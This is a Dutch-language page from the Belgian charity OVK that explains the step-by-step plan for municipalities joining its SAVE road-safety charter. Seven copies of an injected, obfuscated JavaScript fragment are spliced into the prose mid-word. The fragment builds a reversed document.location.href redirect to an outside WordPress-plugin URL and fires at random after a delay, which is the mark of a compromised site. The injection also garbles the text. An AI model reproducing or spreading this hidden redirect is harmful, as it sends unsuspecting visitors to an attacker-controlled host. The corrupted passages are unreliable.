Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Stappenplan

Het SAVE Steden & Gemeenten project bestaat uit een stappenplan dat de stad of gemeente moet doorlopen wanneer zij zich engageert. Dit zijn de stappen:

Stap 1: Een eerste kennismaking

We komen graag langs om het SAVE-charter Steden & Gemeenten (vrijblijvend) toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe te lichten. In een afspraak met de betrokken personen (bv. de burgemeester, schepen van mobiliteit, mobiliteitsambtenaar, iemand van de lokale politie…) wordt nagegaan op welke manier de stad of gemeente kan deelnemen aan dit project.

actieplan-inwisselen

Stap 2 of 3: Ondertekenen SAVE-charter Steden & Gemeenten

De volgende stap is de officiële ondertekening van het charter op een publiek bekendmakingsmoment. Hiermee geeft de gemeente een signaal aan de buitenwereld aan dat ze een actieve bijdrage wil leveren aan het verkeersveiligheidsbeleid, dit gedurende minstens één jaar. Door de ondertekening van het SAVE-charter engageert de gemeente zich een SAVE-actieplan op te maken rond de doelstellingen van het SAVE-charter en hieraan te werken tijdens een SAVE-actiejaar.

Stap 2 of 3: Inventaris en actieplan

Een inventaris wordt gemaakt van de reeds bestaande initiatieven in de gemeente. Er bestaan in elke gemeente ongetwijfeld reeds een heleboel acties/initiatieven ter bevordering van de verkeersveiligheid. Door hiervan een inventarisatie te maken, krijgt zowel het gemeentebestuur als OVK een goed overzicht van wat reeds leeft in de gemeente en waar eventuele bijsturing nodig is.

Voorbeelden van initiatieven die ondernomen kunnen worden om de inventaris op te stellen zijn:

  • Navraag bij de lokale politie i.v.m. de (handhavings)campagnes.
  • Samenvoegen van alle reeds uitgevoerde verkeersveiligheidsanalyses van het grondgebied van de gemeente.
  • Analyse van de geplande wegwerkzaamheden en infrastructuurprojecten.
  • Inventarisatie van alle initiatieven in de gemeente i.s.m. de scholen, jeugdbewegingen en verspreid over verschillende diensten.

Aan de hand van de inventaris wordt, in samenspraak met de SAVE-coördinatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor van OVK, een SAVE-actieplan opgesteld met acties die aansluiten bij de zeven SAVE-doelstellingen. Het is de bedoeling toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een coherent plan te komen dat duidelijk weergeeft dat de gemeente een extra inspanning doet op vlak van verkeersveiligheid. Het uiteindelijke doel van het project is een veiligheidscultuur in de gemeente op te bouwen, waarbij elke beslissing wordt genomen met de verkeersveiligheid in het achterhoofd.

De acties kunnen volledig nieuw zijn, maar ook reeds bestaande acties kunnen verder worden uitgewerkt, worden verbeterd en opnieuw geactiveerd. Belangrijk is dat een duidelijk verschil zichtbaar is met het verleden. Voor het uitwerken van het actieplan kan de gemeente een beroep doen op de begeleiding van de SAVE-coördinatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor van OVK en de “SAVE-leidraad voor het opstellen van een actieplan”.

  • Voorbeelden van actieplannen van de reeds deelnemende gemeenten kunnen worden opgevraagd bij OVK.
  • Er bestaat ook een inspiratiegids opgemaakt uit enkele best-practices van de huidige SAVE Steden & Gemeenten. Ook deze gids kan opgevraagd worden.

Stap 4: Uitvoering (& tussentijdse evaluatie)

Nadat het actieplan is opgesteld, wordt het goedgekeurd door het college en/of de gemeenteraad en de SAVE stuurgroep. Wanneer alle goedkeuringen er zijn, kan de gemeente aan de slag. Op regelmatige basis neemt de SAVE-coördinatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor van OVK contact op met de gemeente om de vorderingen na te gaan en eventuele problemen op te lossen. De projectcoördinatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor kan ook door de gemeente zelf gecontacteerd worden indien nodig. De gemeente heeft in principe één jaar de tijd om het actieplan te realiseren.

Indien gewenst kan een tussentijdse evaluatie plaatsvinden, op vraag van de gemeente of stad. Doel van deze tussentijdse evaluatie is enerzijds de focus op het actieplan te vernieuwen en anderzijds het scherpstellen van acties en bijsturen waar nodig.

Stap 5: Eindevaluatie & uitreiking

Na ongeveer een jaar wordt een eindevaluatie, een activiteitenverslag opgesteld. Hierin wordt opgenomen welke initiatieven al dan niet zijn gerealiseerd en wordt omschreven wat er het voorbije SAVE-actiejaar is gebeurd. Dit verslag wordt vervolgens voorgelegd aan de SAVE stuurgroep ter goedkeuring.

Bij een positieve beoordeling ontvangt de gemeente het SAVE-label. Dit label geeft aan dat de gemeente een actieve bijdrage levert aan de verbetering van de verkeersveiligheid. Het SAVE-label betekent niet dat de gemeente op zich verkeersveilig is, wel dat de gemeente een bijzondere bijdrage levert toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de verbetering van de verkeersveiligheid.

De verwachting van OVK is dat de betrokken gemeente jaarlijks het SAVE-engagement vernieuwt.

algemene-info

 

© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be